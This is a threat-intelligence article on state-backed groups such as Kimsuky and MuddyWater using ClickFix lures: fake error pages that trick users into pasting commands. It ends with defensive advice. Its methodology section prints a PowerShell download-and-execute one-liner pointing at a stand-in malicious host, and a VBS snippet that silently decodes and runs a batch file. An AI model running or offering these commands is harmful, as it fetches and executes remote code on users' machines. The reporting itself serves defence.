State-Sponsored APT Groups Adopt ClickFix Social Engineering Technique

State-sponsored threat actors have increasingly adopted the “ClickFix” social engineering tactic, according to recent reports from cybersecurity researchers. This technique involves tricking users into executing malicious commands by disguising them as solutions to fake technical issues. The method has proven effective against government agencies, defense contractors, and think tanks across multiple regions.

Technical Overview of ClickFix Attacks

The ClickFix technique represents an evolution in social engineering attacks, moving away from traditional malicious attachments toward direct command execution. Attackers impersonate legitimate platforms like Microsoft or Google Docs, presenting victims with fabricated error messages that prompt them to run PowerShell or Command Line Interface commands. Proofpoint researchers note this approach bypasses traditional security controls by relying on user actions rather than file-based payloads.

Recent campaigns have shown sophisticated variations of this technique. Kimsuky (TA427) actors created fake device registration pages that instructed users to run PowerShell commands, while MuddyWater (TA450) spoofed Microsoft security alerts pushing remote management tools. The UNK_RemoteRogue group took this further by compromising Zimbra email servers to redirect victims to malicious pages containing Empire C2 framework code.

Key Threat Actors and Campaign Details

Multiple advanced persistent threat (APT) groups have incorporated ClickFix into their operations since late 2024. Kimsuky, associated with North Korean interests, targeted think tanks analyzing North Korean policy with fake emails posing as Japanese diplomats. Their attacks used VBS scripts configured to run every 19 minutes, maintaining persistence while fetching QuasarRAT payloads.

MuddyWater (TA450), linked to Iranian interests, focused on Middle Eastern governments and Western enterprises. Their campaigns featured fake Microsoft alerts that prompted users to install “Level” RMM tools for data exfiltration. Microsoft has observed these groups using increasingly convincing PowerShell prompts disguised as legitimate system notifications.

Attack Methodology and Technical Indicators

The ClickFix technique typically follows a consistent pattern across campaigns. Attackers first deliver a phishing email or fake error message containing instructions to resolve a purported technical issue. Victims are directed to copy and execute commands that typically follow this structure:

powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"

Kimsuky’s VBS script implementation demonstrates the persistence mechanisms employed:

Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd /c certutil -decode batch_encoded.bat batch_decoded.bat && call batch_decoded.bat", 0

Defensive Recommendations

Organizations can implement several measures to mitigate ClickFix attacks. Restricting PowerShell execution through Group Policy or application whitelisting significantly reduces attack surface. Monitoring for unusual scheduled task creation, particularly those executing command-line utilities, can help detect post-exploitation activity.

User awareness training should emphasize recognizing social engineering attempts involving command execution. Technical staff should verify all instructions requiring command-line actions through official channels. Implementing network segmentation and restricting outbound connections from workstations can limit data exfiltration opportunities.

Conclusion

The adoption of ClickFix techniques by state-sponsored groups represents a shift toward more interactive social engineering. This approach bypasses traditional email security controls by relying on user actions rather than malicious attachments. As these tactics continue to evolve, organizations must balance technical controls with user education to maintain effective defenses.